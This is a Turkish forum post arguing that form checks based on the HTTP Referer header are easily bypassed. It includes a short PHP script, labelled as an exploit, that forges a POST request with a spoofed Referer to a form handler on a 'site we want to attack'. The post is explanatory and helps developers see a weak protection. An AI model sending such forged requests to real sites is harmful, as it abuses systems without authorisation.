Bartuc adlı üyeden alıntı: mesajı görüntüle
register_globals niye on oluyo ki açıklara sebebiyet verdiğinden ötürü artık kullanılmayan bir özelik. Dediğim yok en rahatıdır. ama session da farklı bir çözüm.
Register_Globals Off Olsa bile veri yollarken header'e

"Referer: http://www.benimsitem.com\r\n"

Yazmak yeterlidir Burcu2012 Eğerki Kodları opensource Olarak dağıtmayacaksan
bartuc Dediği şekilde Yapabilirsin Ama Kafaya Takan Biri zaten Her Yolu Dener

Aşağıda basit Bir exploit Etme yöntemi var

<?php



// the site we want to attack

$host = "www.mysite.com"; 



// the file we want to attack

$file = "formprocess.php";



// construct a header for our request

$hdrs = array( 'http' => array(

    'method' => "POST",



    'header'=> "accept-language: en\r\n" . 

        "Host: $host\r\n" .

        "Referer: http://$host\r\n" .  // Setting the http-referer

        "Content-Type: application/x-www-form-urlencoded\r\n" .

        "Content-Length: 33\r\n\r\n" .

        "username=mustap&comment=NOCOMMENT\r\n"

    )

);



// get the requested page from the server

// with our header as a request-header



$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);

fpassthru($fp);

fclose($fp);

?>